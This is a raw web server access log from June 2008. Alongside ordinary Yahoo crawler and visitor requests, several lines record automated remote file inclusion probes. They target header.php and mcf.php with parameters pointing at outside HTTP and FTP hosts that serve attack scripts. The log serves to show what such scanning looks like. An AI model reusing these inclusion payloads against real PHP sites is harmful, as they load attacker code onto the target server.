210.64.124.93 - - [25/Jun/2008:20:48:59 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
210.64.124.93 - - [25/Jun/2008:20:49:00 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
210.64.124.93 - - [25/Jun/2008:20:49:33 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
210.64.124.93 - - [25/Jun/2008:20:49:34 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
74.6.22.164 - - [25/Jun/2008:20:49:35 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [25/Jun/2008:20:49:36 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.18.76 - - [25/Jun/2008:20:50:28 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:50:33 -0500] "GET /logs//mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:50:39 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:50:44 -0500] "GET //mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
70.231.152.201 - - [25/Jun/2008:20:52:21 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Opera/9.50 (Windows NT 5.1; U; en)"
70.231.152.201 - - [25/Jun/2008:20:52:23 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.50 (Windows NT 5.1; U; en)"
